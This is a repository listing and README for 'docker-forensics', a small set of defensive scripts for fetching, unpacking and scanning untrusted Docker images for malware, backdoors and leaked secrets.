https://github.com/innovativeinventor/docker-forensics
Simple, but useful forensic tools to inspect the history and provenance of a Docker image. Used to investigate potential backdoors/malware.
https://github.com/innovativeinventor/docker-forensics
docker forensics
Last synced: about 1 month ago
JSON representation
Simple, but useful forensic tools to inspect the history and provenance of a Docker image. Used to investigate potential backdoors/malware.
- Host: GitHub
- URL: https://github.com/innovativeinventor/docker-forensics
- Owner: InnovativeInventor
- License: gpl-3.0
- Created: 2021-09-03T06:25:28.000Z (almost 5 years ago)
- Default Branch: main
- Last Pushed: 2022-08-23T22:41:07.000Z (almost 4 years ago)
- Last Synced: 2025-07-12T08:37:11.027Z (12 months ago)
- Topics: docker, forensics
- Language: Python
- Homepage:
- Size: 16.6 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
## Docker-forensics
In the real-world, sometimes you're given a Docker image of dubious provenance.
This repo aims to house some useful scripts/tools I've made to analyze and verify untrusted Docker images for backdoors or malware.
Basically, here are some lightweight reversing tools for black-box Docker images.
## Example usage
Fetching [nginx](https://hub.docker.com/_/nginx) images:
```bash
python fetch.py nginx
```
Unpacking:
```bash
bash unpack.sh
```
## Example analysis
From here, you can inspect the filesystems normally. For example if you wanted to search for some string or file:
```bash
rg [some string]
fd [some filename]
```
You can also run `clamav` or other static analyzers to look for suspicious files.
```bash
bash clamscan.sh
```
Or, you can look for leaked secrets.
```bash
bash secrets.sh
```